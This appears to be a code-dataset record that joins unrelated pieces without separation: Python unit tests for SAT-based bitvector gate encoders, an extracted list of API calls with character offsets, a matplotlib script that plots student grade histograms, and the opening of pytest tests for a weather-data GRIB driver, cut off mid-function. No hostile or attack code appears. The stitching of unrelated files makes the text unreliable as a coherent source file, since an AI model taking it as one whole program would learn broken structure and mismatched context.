Test for bvg.encode_bv_or_gate
"""
def get_bitvector_gate_encoder_under_test(self):
return bvg.encode_bv_or_gate
def generate_truth_table(self, gate_arity: int):
return generate_truth_table_for_binary_op(gate_arity, lambda x, y: x | y)
class TestEncodeBVXorGate(unittest.TestCase, AbstractTruthTableBasedPlainBitvectorToBitvectorGateTest):
"""
Test for bvg.encode_bv_xor_gate
"""
def get_bitvector_gate_encoder_under_test(self):
return bvg.encode_bv_xor_gate
def generate_truth_table(self, gate_arity: int):
return generate_truth_table_for_binary_op(gate_arity, lambda x, y: x ^ y)
class TestEncodeBvRippleCarrySubGate(unittest.TestCase, AbstractTruthTableBasedPlainBitvectorToBitvectorGateTest):
"""
Test for bvg.encode_bv_ripple_carry_sub_gate
"""
def get_bitvector_gate_encoder_under_test(self):
return bvg.encode_bv_ripple_carry_sub_gate
def generate_truth_table(self, gate_arity: int):
truth_table = []
for lhs, rhs in itertools.product(range(0, 2**gate_arity), range(0, 2**gate_arity)):
output = lhs - rhs
table_entry = (int_to_bitvec(lhs, gate_arity) + int_to_bitvec(rhs, gate_arity),
int_to_bitvec(output, gate_arity))
truth_table.append(table_entry)
return truth_table
#
# Tests for binary predicates (sle, ule, equality):
#
def generate_truth_table_for_bv_predicate(gate_arity: int, predicate):
"""
Generates a truth table using the given binary predicate on integers.
:param gate_arity: The gate's arity.
:param predicate: A function mapping tuples (l, r, w) to a bool, with all but the lowermost w bits of l and r being
ignored.
:return: The truth table for a gate applying predicate to the input bitvectors.
The returned object is a truth table in the sense of AbstractTruthTableBasedBitvectorGateTest's
documentation, with all possible input assignments occurring in the truth table.
"""
truth_table = []
for lhs, rhs in itertools.product(range(0, 2 ** gate_arity), range(0, 2 ** gate_arity)):
output = predicate(lhs, rhs, gate_arity)
table_entry = (int_to_bitvec(lhs, gate_arity) + int_to_bitvec(rhs, gate_arity),
(1,) if output is True else (0,))
truth_table.append(table_entry)
return truth_table
class TestEncodeBVUnsignedLessThanOrEqualCompGate(unittest.TestCase,
AbstractTruthTableBasedPlainBitvectorPredicateGateTest):
"""
Test for bvg.encode_bv_ule_gate
"""
def get_bitvector_gate_encoder_under_test(self):
return bvg.encode_bv_ule_gate
def generate_truth_table(self, gate_arity: int):
predicate = lambda l, r, width: (l & (2**width - 1)) <= (r & (2**width - 1))
return generate_truth_table_for_bv_predicate(gate_arity, predicate)
class TestEncodeBVSignedLessThanOrEqualCompGate(unittest.TestCase,
AbstractTruthTableBasedPlainBitvectorPredicateGateTest):
"""
Test for bvg.encode_bv_sle_gate
"""
def get_bitvector_gate_encoder_under_test(self):
return bvg.encode_bv_sle_gate
def generate_truth_table(self, gate_arity: int):
def __sign_extend(x: int, from_width: int):
self.assertTrue(from_width > 0)
sign = 1 if (x & (1 << (from_width-1))) != 0 else 0
sign_extension_mask = ~((1 << from_width) - 1)
if sign == 0:
return x & ~sign_extension_mask
else:
return x | sign_extension_mask
predicate = lambda l, r, width: __sign_extend(l, width) <= __sign_extend(r, width)
return generate_truth_table_for_bv_predicate(gate_arity, predicate)
class TestEncodeBVEqualityCompGate(unittest.TestCase,
AbstractTruthTableBasedPlainBitvectorPredicateGateTest):
"""
Test for bvg.encode_bv_eq_gate
"""
def get_bitvector_gate_encoder_under_test(self):
return bvg.encode_bv_eq_gate
def generate_truth_table(self, gate_arity: int):
predicate = lambda l, r, width: (l & (2**width - 1)) == (r & (2**width - 1))
return generate_truth_table_for_bv_predicate(gate_arity, predicate)
#
# Tests for binary multiplier gates:
#
class TestEncodeParallelBVMultiplierGateEncoder(AbstractTruthTableBasedBitvectorToBitvectorGateTest,
abc.ABC):
"""
Test for bvg.encode_bv_parallel_mul_gate
"""
def get_bitvector_gate_encoder_under_test(self):
return bvg.encode_bv_parallel_mul_gate
@abc.abstractmethod
def is_test_with_overflow_output(self) -> bool:
pass
def generate_truth_table(self, gate_arity: int):
result = []
include_overflow_bit = self.is_test_with_overflow_output()
for lhs_setting in range(0, 2 ** gate_arity):
for rhs_setting in range(0, 2 ** gate_arity):
expected_output = lhs_setting * rhs_setting
expected_overflow = 1 if ((expected_output >> gate_arity) != 0) else 0
expected_output = expected_output & ((1 << gate_arity) - 1)
input_setting = int_to_bitvec(lhs_setting, gate_arity) + int_to_bitvec(rhs_setting, gate_arity)
output_setting = int_to_bitvec(expected_output, gate_arity) + \
(expected_overflow,) if include_overflow_bit else tuple()
result.append((input_setting, output_setting))
return result
def encode_gate_under_test(self, clause_consumer: cscl_if.ClauseConsumer,
lit_factory: cscl_if.CNFLiteralFactory, gate_arity: int):
lhs_input_lits = [lit_factory.create_literal() for _ in range(0, gate_arity)]
rhs_input_lits = [lit_factory.create_literal() for _ in range(0, gate_arity)]
overflow_lit = lit_factory.create_literal() if self.is_test_with_overflow_output() else None
encoder_under_test = self.get_bitvector_gate_encoder_under_test()
output_lits = encoder_under_test(clause_consumer=clause_consumer,
lit_factory=lit_factory,
lhs_input_lits=lhs_input_lits,
rhs_input_lits=rhs_input_lits,
overflow_lit=overflow_lit)
if overflow_lit is None:
return lhs_input_lits+rhs_input_lits, output_lits
else:
return lhs_input_lits+rhs_input_lits, (output_lits + [overflow_lit])
class TestEncodeParallelBVMultiplierGateEncoderWithOverflowLit(unittest.TestCase,
TestEncodeParallelBVMultiplierGateEncoder):
def is_test_with_overflow_output(self) -> bool:
return True
class TestEncodeParallelBVMultiplierGateEncoderWithoutOverflowLit(unittest.TestCase,
TestEncodeParallelBVMultiplierGateEncoder):
def is_test_with_overflow_output(self) -> bool:
return False
#
# Tests for bitvector MUX:
#
class TestEncodeBVMuxGateEncoder(unittest.TestCase,
AbstractTruthTableBasedBitvectorToBitvectorGateTest):
"""
Test for bvg.encode_bv_mux_gate
"""
def get_bitvector_gate_encoder_under_test(self):
return bvg.encode_bv_mux_gate
def generate_truth_table(self, gate_arity: int):
result = []
for lhs_setting in range(0, 2 ** gate_arity):
for rhs_setting in range(0, 2 ** gate_arity):
for select_lhs_setting in (0, 1):
expected_output = lhs_setting if select_lhs_setting is 1 else rhs_setting
input_setting = int_to_bitvec(lhs_setting, gate_arity) + int_to_bitvec(rhs_setting, gate_arity) \
+ int_to_bitvec(select_lhs_setting, 1)
output_setting = int_to_bitvec(expected_output, gate_arity)
result.append((input_setting, output_setting))
return result
def encode_gate_under_test(self, clause_consumer: cscl_if.ClauseConsumer,
lit_factory: cscl_if.CNFLiteralFactory, gate_arity: int):
lhs_input_lits = [lit_factory.create_literal() for _ in range(0, gate_arity)]
rhs_input_lits = [lit_factory.create_literal() for _ in range(0, gate_arity)]
select_lhs_lit = lit_factory.create_literal()
output_lits = bvg.encode_bv_mux_gate(clause_consumer=clause_consumer,
lit_factory=lit_factory,
lhs_input_lits=lhs_input_lits,
rhs_input_lits=rhs_input_lits,
select_lhs_lit=select_lhs_lit)
return lhs_input_lits+rhs_input_lits+[select_lhs_lit], output_lits
#
# Tests for bitvector division encoders:
#
class TestEncodeBvLongUDivGate(unittest.TestCase, AbstractTruthTableBasedPlainBitvectorToBitvectorGateTest):
"""
Test for bvg.encode_bv_long_udiv_gate
"""
def get_bitvector_gate_encoder_under_test(self):
return bvg.encode_bv_long_udiv_gate
def generate_truth_table(self, gate_arity: int):
truth_table = []
for lhs, rhs in itertools.product(range(0, 2**gate_arity), range(0, 2**gate_arity)):
output = int(lhs/rhs) if rhs != 0 else 0
table_entry = (int_to_bitvec(lhs, gate_arity) + int_to_bitvec(rhs, gate_arity),
int_to_bitvec(output, gate_arity))
truth_table.append(table_entry)
return truth_table
class TestEncodeBvLongURemGate(unittest.TestCase, AbstractTruthTableBasedPlainBitvectorToBitvectorGateTest):
"""
Test for bvg.encode_bv_long_urem_gate
"""
def get_bitvector_gate_encoder_under_test(self):
return bvg.encode_bv_long_urem_gate
def generate_truth_table(self, gate_arity: int):
truth_table = []
for lhs, rhs in itertools.product(range(0, 2**gate_arity), range(0, 2**gate_arity)):
output = (lhs % rhs) if rhs != 0 else 0
table_entry = (int_to_bitvec(lhs, gate_arity) + int_to_bitvec(rhs, gate_arity),
int_to_bitvec(output, gate_arity))
truth_table.append(table_entry)
return truth_table
#
# Tests for unary bitvector gate encoders:
#
class TestEncodeStaggeredOrGate(unittest.TestCase):
def test_returns_empty_seq_when_no_inputs_provided(self):
clause_consumer = CollectingClauseConsumer()
lit_factory = TestLiteralFactory()
result = bvg.encode_staggered_or_gate(clause_consumer=clause_consumer, lit_factory=lit_factory, input_lits=[])
self.assertEqual(list(result), [], "Unexpected result " + str(result))
def test_raises_exception_when_input_and_output_sizes_mismatch(self):
clause_consumer = CollectingClauseConsumer()
lit_factory = TestLiteralFactory()
with self.assertRaises(ValueError):
bvg.encode_staggered_or_gate(clause_consumer=clause_consumer, lit_factory=lit_factory,
input_lits=[lit_factory.create_literal()],
output_lits=[lit_factory.create_literal(), lit_factory.create_literal()])
def test_encodes_equivalency_for_unary_input(self):
solver = TrivialSATSolver()
input_lit = solver.create_literal()
output_lit = solver.create_literal()
bvg.encode_staggered_or_gate(clause_consumer=solver, lit_factory=solver,
input_lits=[input_lit],
output_lits=[output_lit])
self.assertTrue(solver.solve([]), "Without further constraints, the gate encoding must be satisfiable")
self.assertFalse(solver.solve([input_lit, -output_lit]), "Unexpected: input not equivalent to output")
self.assertFalse(solver.solve([-input_lit, output_lit]), "Unexpected: input not equivalent to output")
def test_is_staggered_or_gate_for_ternary_input(self):
for test_index in range(0, 8):
solver = TrivialSATSolver()
input_lits = [solver.create_literal() for _ in range(0, 3)]
output_lits = bvg.encode_staggered_or_gate(clause_consumer=solver, lit_factory=solver,
input_lits=input_lits)
test_input = [input_lits[i] if (test_index & (1 << i)) != 0 else -input_lits[i] for i in range(0, 3)]
expected_output = [output_lits[i] if any(x > 0 for x in test_input[i:]) else -output_lits[i]
for i in range(0, 3)]
maps_input = solver.solve(test_input + expected_output)
self.assertTrue(maps_input, "The gate under test violates its input/output spec")
solver.consume_clause([-o for o in expected_output])
self.assertFalse(solver.solve(test_input), "Unexpected: encoding is not a gate encoding")
class TestEncodePopcountGate(unittest.TestCase):
def test_encodes_popcount_for_unary_input(self):
solver = TrivialSATSolver()
input_lit = solver.create_literal()
output_lit = solver.create_literal()
bvg.encode_bv_popcount_gate(clause_consumer=solver, lit_factory=solver, input_lits=[input_lit],
output_lits=[output_lit])
self.assertTrue(solver.solve([]), "Without further constraints, the gate encoding must be satisfiable")
self.assertFalse(solver.solve([input_lit, -output_lit]), "Unexpected: input not equivalent to output")
self.assertFalse(solver.solve([-input_lit, output_lit]), "Unexpected: input not equivalent to output")
def check_encodes_popcount_for_nary_input(self, width):
output_width = int(math.ceil(math.log2(width+1)))
for i in range(0, 2**width):
solver = TrivialSATSolver()
input_lits = [solver.create_literal() for _ in range(0, width)]
output_lits = [solver.create_literal() for _ in range(0, output_width)]
bvg.encode_bv_popcount_gate(clause_consumer=solver, lit_factory=solver, input_lits=input_lits,
output_lits=output_lits)
reference_popcount = bin(i).count('1')
input_setting = apply_truth_table_setting(input_lits, int_to_bitvec(i, width))
expected_output_setting = apply_truth_table_setting(output_lits,
int_to_bitvec(reference_popcount,
output_width))
self.assertTrue(solver.solve(input_setting + expected_output_setting),
"The gate should be satisfiable under the expected output setting, but is not")
solver.consume_clause([-x for x in expected_output_setting])
self.assertFalse(solver.solve(input_setting),
"The gate should force the expected output setting, but does not")
def test_encodes_popcount_for_binary_input(self):
self.check_encodes_popcount_for_nary_input(2)
def test_encodes_popcount_for_ternary_input(self):
self.check_encodes_popcount_for_nary_input(3)
def test_encodes_popcount_for_4ary_input(self):
self.check_encodes_popcount_for_nary_input(4)
def test_encodes_popcount_for_5ary_input(self):
self.check_encodes_popcount_for_nary_input(5)
def test_raises_exception_for_empty_input(self):
with self.assertRaises(ValueError):
solver = TrivialSATSolver()
input_lits = []
bvg.encode_bv_popcount_gate(clause_consumer=solver, lit_factory=solver, input_lits=input_lits)
def test_raises_exception_for_mismatching_output_size(self):
with self.assertRaises(ValueError):
solver = TrivialSATSolver()
input_lits = [solver.create_literal() for _ in range(0, 8)]
output_lits = [solver.create_literal() for _ in range(0, 4)]
bvg.encode_bv_popcount_gate(clause_consumer=solver, lit_factory=solver,
input_lits=input_lits, output_lits=output_lits)
|
[
"math.log2",
"cscl.bitvector_gate_encoders.encode_bv_mux_gate",
"cscl_tests.testutils.trivial_sat_solver.TrivialSATSolver",
"cscl.bitvector_gate_encoders.encode_staggered_or_gate",
"cscl_tests.testutils.logging_clause_consumer_decorator.LoggingClauseConsumerDecorator",
"cscl.bitvector_gate_encoders.encode_bv_ripple_carry_adder_gate",
"cscl.bitvector_gate_encoders.encode_gate_vector",
"cscl.bitvector_gate_encoders.encode_bv_popcount_gate",
"itertools.chain",
"unittest.TestCase.assertRaises"
] |
[((1359, 1493), 'cscl.bitvector_gate_encoders.encode_gate_vector', 'bvg.encode_gate_vector', (['clause_consumer', 'lit_factory', '__should_not_be_called'], {'lhs_input_lits': '[]', 'rhs_input_lits': '[]', 'output_lits': '[]'}), '(clause_consumer, lit_factory, __should_not_be_called,\n lhs_input_lits=[], rhs_input_lits=[], output_lits=[])\n', (1381, 1493), True, 'import cscl.bitvector_gate_encoders as bvg\n'), ((3697, 3874), 'cscl.bitvector_gate_encoders.encode_gate_vector', 'bvg.encode_gate_vector', (['clause_consumer', 'lit_factory', '__output_collecting_encoder'], {'lhs_input_lits': '[lits[0], lits[1]]', 'rhs_input_lits': '[lits[2], lits[3]]', 'output_lits': 'None'}), '(clause_consumer, lit_factory,\n __output_collecting_encoder, lhs_input_lits=[lits[0], lits[1]],\n rhs_input_lits=[lits[2], lits[3]], output_lits=None)\n', (3719, 3874), True, 'import cscl.bitvector_gate_encoders as bvg\n'), ((36018, 36201), 'cscl.bitvector_gate_encoders.encode_bv_mux_gate', 'bvg.encode_bv_mux_gate', ([], {'clause_consumer': 'clause_consumer', 'lit_factory': 'lit_factory', 'lhs_input_lits': 'lhs_input_lits', 'rhs_input_lits': 'rhs_input_lits', 'select_lhs_lit': 'select_lhs_lit'}), '(clause_consumer=clause_consumer, lit_factory=\n lit_factory, lhs_input_lits=lhs_input_lits, rhs_input_lits=\n rhs_input_lits, select_lhs_lit=select_lhs_lit)\n', (36040, 36201), True, 'import cscl.bitvector_gate_encoders as bvg\n'), ((38205, 38311), 'cscl.bitvector_gate_encoders.encode_staggered_or_gate', 'bvg.encode_staggered_or_gate', ([], {'clause_consumer': 'clause_consumer', 'lit_factory': 'lit_factory', 'input_lits': '[]'}), '(clause_consumer=clause_consumer, lit_factory=\n lit_factory, input_lits=[])\n', (38233, 38311), True, 'import cscl.bitvector_gate_encoders as bvg\n'), ((38973, 38991), 'cscl_tests.testutils.trivial_sat_solver.TrivialSATSolver', 'TrivialSATSolver', ([], {}), '()\n', (38989, 38991), False, 'from cscl_tests.testutils.trivial_sat_solver import TrivialSATSolver\n'), ((39089, 39215), 'cscl.bitvector_gate_encoders.encode_staggered_or_gate', 'bvg.encode_staggered_or_gate', ([], {'clause_consumer': 'solver', 'lit_factory': 'solver', 'input_lits': '[input_lit]', 'output_lits': '[output_lit]'}), '(clause_consumer=solver, lit_factory=solver,\n input_lits=[input_lit], output_lits=[output_lit])\n', (39117, 39215), True, 'import cscl.bitvector_gate_encoders as bvg\n'), ((40734, 40752), 'cscl_tests.testutils.trivial_sat_solver.TrivialSATSolver', 'TrivialSATSolver', ([], {}), '()\n', (40750, 40752), False, 'from cscl_tests.testutils.trivial_sat_solver import TrivialSATSolver\n'), ((40850, 40975), 'cscl.bitvector_gate_encoders.encode_bv_popcount_gate', 'bvg.encode_bv_popcount_gate', ([], {'clause_consumer': 'solver', 'lit_factory': 'solver', 'input_lits': '[input_lit]', 'output_lits': '[output_lit]'}), '(clause_consumer=solver, lit_factory=solver,\n input_lits=[input_lit], output_lits=[output_lit])\n', (40877, 40975), True, 'import cscl.bitvector_gate_encoders as bvg\n'), ((2074, 2234), 'cscl.bitvector_gate_encoders.encode_gate_vector', 'bvg.encode_gate_vector', (['clause_consumer', 'lit_factory', '__noop_encoder'], {'lhs_input_lits': '[lits[0]]', 'rhs_input_lits': '[lits[1], lits[2]]', 'output_lits': '[lits[3]]'}), '(clause_consumer, lit_factory, __noop_encoder,\n lhs_input_lits=[lits[0]], rhs_input_lits=[lits[1], lits[2]],\n output_lits=[lits[3]])\n', (2096, 2234), True, 'import cscl.bitvector_gate_encoders as bvg\n'), ((2834, 3003), 'cscl.bitvector_gate_encoders.encode_gate_vector', 'bvg.encode_gate_vector', (['clause_consumer', 'lit_factory', '__noop_encoder'], {'lhs_input_lits': '[lits[0], lits[1]]', 'rhs_input_lits': '[lits[2], lits[3]]', 'output_lits': '[lits[4]]'}), '(clause_consumer, lit_factory, __noop_encoder,\n lhs_input_lits=[lits[0], lits[1]], rhs_input_lits=[lits[2], lits[3]],\n output_lits=[lits[4]])\n', (2856, 3003), True, 'import cscl.bitvector_gate_encoders as bvg\n'), ((6570, 6588), 'cscl_tests.testutils.trivial_sat_solver.TrivialSATSolver', 'TrivialSATSolver', ([], {}), '()\n', (6586, 6588), False, 'from cscl_tests.testutils.trivial_sat_solver import TrivialSATSolver\n'), ((6933, 6972), 'cscl_tests.testutils.logging_clause_consumer_decorator.LoggingClauseConsumerDecorator', 'LoggingClauseConsumerDecorator', (['checker'], {}), '(checker)\n', (6963, 6972), False, 'from cscl_tests.testutils.logging_clause_consumer_decorator import LoggingClauseConsumerDecorator\n'), ((6999, 7168), 'cscl.bitvector_gate_encoders.encode_bv_ripple_carry_adder_gate', 'bvg.encode_bv_ripple_carry_adder_gate', (['clause_consumer', 'checker', 'lhs_input_lits', 'rhs_input_lits'], {'output_lits': 'None', 'carry_in_lit': 'carry_in', 'carry_out_lit': 'carry_out'}), '(clause_consumer, checker,\n lhs_input_lits, rhs_input_lits, output_lits=None, carry_in_lit=carry_in,\n carry_out_lit=carry_out)\n', (7036, 7168), True, 'import cscl.bitvector_gate_encoders as bvg\n'), ((15879, 15897), 'cscl_tests.testutils.trivial_sat_solver.TrivialSATSolver', 'TrivialSATSolver', ([], {}), '()\n', (15895, 15897), False, 'from cscl_tests.testutils.trivial_sat_solver import TrivialSATSolver\n'), ((15928, 15967), 'cscl_tests.testutils.logging_clause_consumer_decorator.LoggingClauseConsumerDecorator', 'LoggingClauseConsumerDecorator', (['checker'], {}), '(checker)\n', (15958, 15967), False, 'from cscl_tests.testutils.logging_clause_consumer_decorator import LoggingClauseConsumerDecorator\n'), ((18900, 18948), 'unittest.TestCase.assertRaises', 'unittest.TestCase.assertRaises', (['self', 'ValueError'], {}), '(self, ValueError)\n', (18930, 18948), False, 'import unittest\n'), ((22637, 22685), 'unittest.TestCase.assertRaises', 'unittest.TestCase.assertRaises', (['self', 'ValueError'], {}), '(self, ValueError)\n', (22667, 22685), False, 'import unittest\n'), ((39741, 39759), 'cscl_tests.testutils.trivial_sat_solver.TrivialSATSolver', 'TrivialSATSolver', ([], {}), '()\n', (39757, 39759), False, 'from cscl_tests.testutils.trivial_sat_solver import TrivialSATSolver\n'), ((39858, 39957), 'cscl.bitvector_gate_encoders.encode_staggered_or_gate', 'bvg.encode_staggered_or_gate', ([], {'clause_consumer': 'solver', 'lit_factory': 'solver', 'input_lits': 'input_lits'}), '(clause_consumer=solver, lit_factory=solver,\n input_lits=input_lits)\n', (39886, 39957), True, 'import cscl.bitvector_gate_encoders as bvg\n'), ((41520, 41538), 'cscl_tests.testutils.trivial_sat_solver.TrivialSATSolver', 'TrivialSATSolver', ([], {}), '()\n', (41536, 41538), False, 'from cscl_tests.testutils.trivial_sat_solver import TrivialSATSolver\n'), ((41711, 41834), 'cscl.bitvector_gate_encoders.encode_bv_popcount_gate', 'bvg.encode_bv_popcount_gate', ([], {'clause_consumer': 'solver', 'lit_factory': 'solver', 'input_lits': 'input_lits', 'output_lits': 'output_lits'}), '(clause_consumer=solver, lit_factory=solver,\n input_lits=input_lits, output_lits=output_lits)\n', (41738, 41834), True, 'import cscl.bitvector_gate_encoders as bvg\n'), ((43254, 43272), 'cscl_tests.testutils.trivial_sat_solver.TrivialSATSolver', 'TrivialSATSolver', ([], {}), '()\n', (43270, 43272), False, 'from cscl_tests.testutils.trivial_sat_solver import TrivialSATSolver\n'), ((43313, 43411), 'cscl.bitvector_gate_encoders.encode_bv_popcount_gate', 'bvg.encode_bv_popcount_gate', ([], {'clause_consumer': 'solver', 'lit_factory': 'solver', 'input_lits': 'input_lits'}), '(clause_consumer=solver, lit_factory=solver,\n input_lits=input_lits)\n', (43340, 43411), True, 'import cscl.bitvector_gate_encoders as bvg\n'), ((43539, 43557), 'cscl_tests.testutils.trivial_sat_solver.TrivialSATSolver', 'TrivialSATSolver', ([], {}), '()\n', (43555, 43557), False, 'from cscl_tests.testutils.trivial_sat_solver import TrivialSATSolver\n'), ((43715, 43838), 'cscl.bitvector_gate_encoders.encode_bv_popcount_gate', 'bvg.encode_bv_popcount_gate', ([], {'clause_consumer': 'solver', 'lit_factory': 'solver', 'input_lits': 'input_lits', 'output_lits': 'output_lits'}), '(clause_consumer=solver, lit_factory=solver,\n input_lits=input_lits, output_lits=output_lits)\n', (43742, 43838), True, 'import cscl.bitvector_gate_encoders as bvg\n'), ((7999, 8047), 'itertools.chain', 'itertools.chain', (['probe_lhs', 'probe_rhs', 'probe_out'], {}), '(probe_lhs, probe_rhs, probe_out)\n', (8014, 8047), False, 'import itertools\n'), ((8624, 8661), 'itertools.chain', 'itertools.chain', (['probe_lhs', 'probe_rhs'], {}), '(probe_lhs, probe_rhs)\n', (8639, 8661), False, 'import itertools\n'), ((41441, 41461), 'math.log2', 'math.log2', (['(width + 1)'], {}), '(width + 1)\n', (41450, 41461), False, 'import math\n')]
|
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import sys
import os
from os import listdir
from PIL import Image
import shutil
from io import BytesIO
#val = {'2017Autumn': {'A': 12, 'C': 2, 'B': 3, 'D': 0, 'F': 0, 'P': 0, 'EX': 8}, '2018Spring': {'A': 6, 'C': 3, 'B': 6, 'D': 3, 'F': 0, 'P': 3, 'EX': 4}, '2016Spring': {'A': 2, 'C': 0, 'B': 1, 'D': 0, 'F': 0, 'P': 0, 'EX': 3}, '2017Spring': {'A': 12, 'C': 2, 'B': 3, 'D': 0, 'F': 0, 'P': 0, 'EX': 8}}
x_groups = ['EX', 'A', 'B', 'C', 'D', 'P', 'F']
def DrawLineHistorical():
im = Image.open('Grades/Temp_files/HistoricalAverage.png')
width, height = im.size
for x in range(width):
for y in range(12):
im.putpixel((x,y),(146,138,138))
im.save('Grades/Temp_files/HistoricalAverage.png')
def RemovePreviousStitichedImage(): #Deletes the previously stiched graph containg image.
mydir = 'figure/'
filelist = [ f for f in os.listdir(mydir) if f.endswith(".jpg") ]
for f in filelist:
os.remove(os.path.join(mydir, f))
def RemovePreviousInvidualGraphs(): #Deletes the previously stiched graph containg image.
mydir = 'Grades/Temp_files/'
filelist = [ f for f in os.listdir(mydir) if f.endswith(".png") ]
for f in filelist:
os.remove(os.path.join(mydir, f))
def CombineImage(val, code): #Function to stich gaphs together into one image
total_height = 0
max_width = 0
courses_available_sorted = []
for semester, grades in val.items():
im = Image.open('Grades/Temp_files/%s.png' % semester)
width, height = im.size
total_height = total_height + height
max_width = max(max_width,width)
courses_available_sorted.append(semester)
courses_available_sorted.sort()
#The following code is for historical average
im = Image.open('Grades/Temp_files/HistoricalAverage.png')
width, height = im.size
total_height = total_height + height
max_width = max(max_width,width)
courses_available_sorted.append('HistoricalAverage')
img = Image.new('RGB', (max_width, total_height ))
y_offset = 0
for semester in courses_available_sorted:
im = Image.open('Grades/Temp_files/%s.png' % semester)
img.paste(im, (0,y_offset))
y_offset += im.size[1]
img.save('figure/%s.jpg' % code)
RemovePreviousInvidualGraphs()
def GeneratePlots(x_groups,x,y_values,semester) :
plt.bar(x,y_values)
plt.title(semester)
plt.ylabel('No of students')
plt.xticks(x, x_groups)
for i in range(0,7):
if(y_values[i]>0):
plt.text ( x = i-0.3, y = y_values[i]+0.005, s = y_values[i], size = 12)
plt.savefig('Grades/Temp_files/%s.png' % semester)
plt.close()
def MakeGraphs(val, code) :
number_courses = 0
total_grades = [0] * 7 #This variable stores sum of grades corresponding to EX, A, B, C, D, P, F
#print("Makegraphbegin")
for semester, grades in val.items():
x = range(7)
y_values = [grades['EX'],grades['A'],grades['B'],grades['C'],grades['D'],grades['P'],grades['F']]
for i in range(7):
total_grades[i] = total_grades[i] + y_values[i]
GeneratePlots(x_groups,x,y_values,semester)
number_courses = number_courses+1
avg_grades = [0.0] * 7
for i in range(7):
avg_grades[i] = float(total_grades[i])/number_courses
GeneratePlots(x_groups,x,avg_grades,'HistoricalAverage')
RemovePreviousStitichedImage()
DrawLineHistorical()
CombineImage(val, code)
#print ("Makegraph_end")
#MakeGraphs(val,'2')
|
[
"matplotlib.pyplot.title",
"PIL.Image.new",
"matplotlib.pyplot.close",
"matplotlib.pyplot.bar",
"PIL.Image.open",
"matplotlib.pyplot.text",
"matplotlib.use",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xticks",
"os.path.join",
"os.listdir",
"matplotlib.pyplot.savefig"
] |
[((18, 39), 'matplotlib.use', 'matplotlib.use', (['"""Agg"""'], {}), "('Agg')\n", (32, 39), False, 'import matplotlib\n'), ((564, 617), 'PIL.Image.open', 'Image.open', (['"""Grades/Temp_files/HistoricalAverage.png"""'], {}), "('Grades/Temp_files/HistoricalAverage.png')\n", (574, 617), False, 'from PIL import Image\n'), ((1838, 1891), 'PIL.Image.open', 'Image.open', (['"""Grades/Temp_files/HistoricalAverage.png"""'], {}), "('Grades/Temp_files/HistoricalAverage.png')\n", (1848, 1891), False, 'from PIL import Image\n'), ((2070, 2113), 'PIL.Image.new', 'Image.new', (['"""RGB"""', '(max_width, total_height)'], {}), "('RGB', (max_width, total_height))\n", (2079, 2113), False, 'from PIL import Image\n'), ((2456, 2476), 'matplotlib.pyplot.bar', 'plt.bar', (['x', 'y_values'], {}), '(x, y_values)\n', (2463, 2476), True, 'import matplotlib.pyplot as plt\n'), ((2484, 2503), 'matplotlib.pyplot.title', 'plt.title', (['semester'], {}), '(semester)\n', (2493, 2503), True, 'import matplotlib.pyplot as plt\n'), ((2521, 2549), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""No of students"""'], {}), "('No of students')\n", (2531, 2549), True, 'import matplotlib.pyplot as plt\n'), ((2558, 2581), 'matplotlib.pyplot.xticks', 'plt.xticks', (['x', 'x_groups'], {}), '(x, x_groups)\n', (2568, 2581), True, 'import matplotlib.pyplot as plt\n'), ((2757, 2807), 'matplotlib.pyplot.savefig', 'plt.savefig', (["('Grades/Temp_files/%s.png' % semester)"], {}), "('Grades/Temp_files/%s.png' % semester)\n", (2768, 2807), True, 'import matplotlib.pyplot as plt\n'), ((2816, 2827), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (2825, 2827), True, 'import matplotlib.pyplot as plt\n'), ((1523, 1572), 'PIL.Image.open', 'Image.open', (["('Grades/Temp_files/%s.png' % semester)"], {}), "('Grades/Temp_files/%s.png' % semester)\n", (1533, 1572), False, 'from PIL import Image\n'), ((2192, 2241), 'PIL.Image.open', 'Image.open', (["('Grades/Temp_files/%s.png' % semester)"], {}), "('Grades/Temp_files/%s.png' % semester)\n", (2202, 2241), False, 'from PIL import Image\n'), ((948, 965), 'os.listdir', 'os.listdir', (['mydir'], {}), '(mydir)\n', (958, 965), False, 'import os\n'), ((1032, 1054), 'os.path.join', 'os.path.join', (['mydir', 'f'], {}), '(mydir, f)\n', (1044, 1054), False, 'import os\n'), ((1208, 1225), 'os.listdir', 'os.listdir', (['mydir'], {}), '(mydir)\n', (1218, 1225), False, 'import os\n'), ((1292, 1314), 'os.path.join', 'os.path.join', (['mydir', 'f'], {}), '(mydir, f)\n', (1304, 1314), False, 'import os\n'), ((2667, 2733), 'matplotlib.pyplot.text', 'plt.text', ([], {'x': '(i - 0.3)', 'y': '(y_values[i] + 0.005)', 's': 'y_values[i]', 'size': '(12)'}), '(x=i - 0.3, y=y_values[i] + 0.005, s=y_values[i], size=12)\n', (2675, 2733), True, 'import matplotlib.pyplot as plt\n')]
|
import pygrib
import os
import pytz
import datetime as dt
import pytest
from forest_lite.server.drivers import nearcast
from forest_lite.server.drivers.nearcast import (driver,
parse_date,
get_data_vars,
get_first_fixed_surface,
get_validity)
from forest_lite.server.drivers.base import BaseDriver
from numpy.testing import assert_array_almost_equal
UTC = pytz.timezone('UTC')
SAMPLE_DIR = os.path.join(os.path.dirname(__file__), "sample")
@pytest.fixture
def real_file():
return os.path.join(SAMPLE_DIR,
"NEARCAST_20210125_0000_LAKEVIC_LATLON.GRIB2")
@pytest.fixture
def sample_file():
return os.path.join(SAMPLE_DIR, "nearcast.grib2")
@pytest.fixture
def settings(sample_file):
return {"pattern": sample_file}
@pytest.fixture
def data_var():
return "Pseudo-adiabatic potential temperature"
def test_importable():
assert isinstance(driver, BaseDriver)
def test_description(settings):
actual = driver.description(settings).dict()
assert actual["attrs"] == {
"product": "Nearcast",
"reference": "CIMSS, University Wisconsin-Madison",
}
data_var = "Pseudo-adiabatic potential temperature"
assert actual["data_vars"][data_var] == {
"dims": ["start_time", "time", "level"],
"attrs": {
"long_name": "Pseudo-adiabatic potential temperature",
"units": "K"
}
}
@pytest.mark.parametrize("object_key,expected", [
("NEARCAST_20210125_0000_LAKEVIC_LATLON.GRIB2", dt.datetime(2021, 1, 25,
tzinfo=UTC)),
("nearcast.grib2", None)
])
def test_parse_date(object_key, expected):
actual = parse_date(object_key)
assert actual == expected
def test_driver_points(settings):
data_var = ""
dim_name = nearcast.DIMENSION.start_time.name
actual = driver.points(settings, data_var, dim_name)["data"]
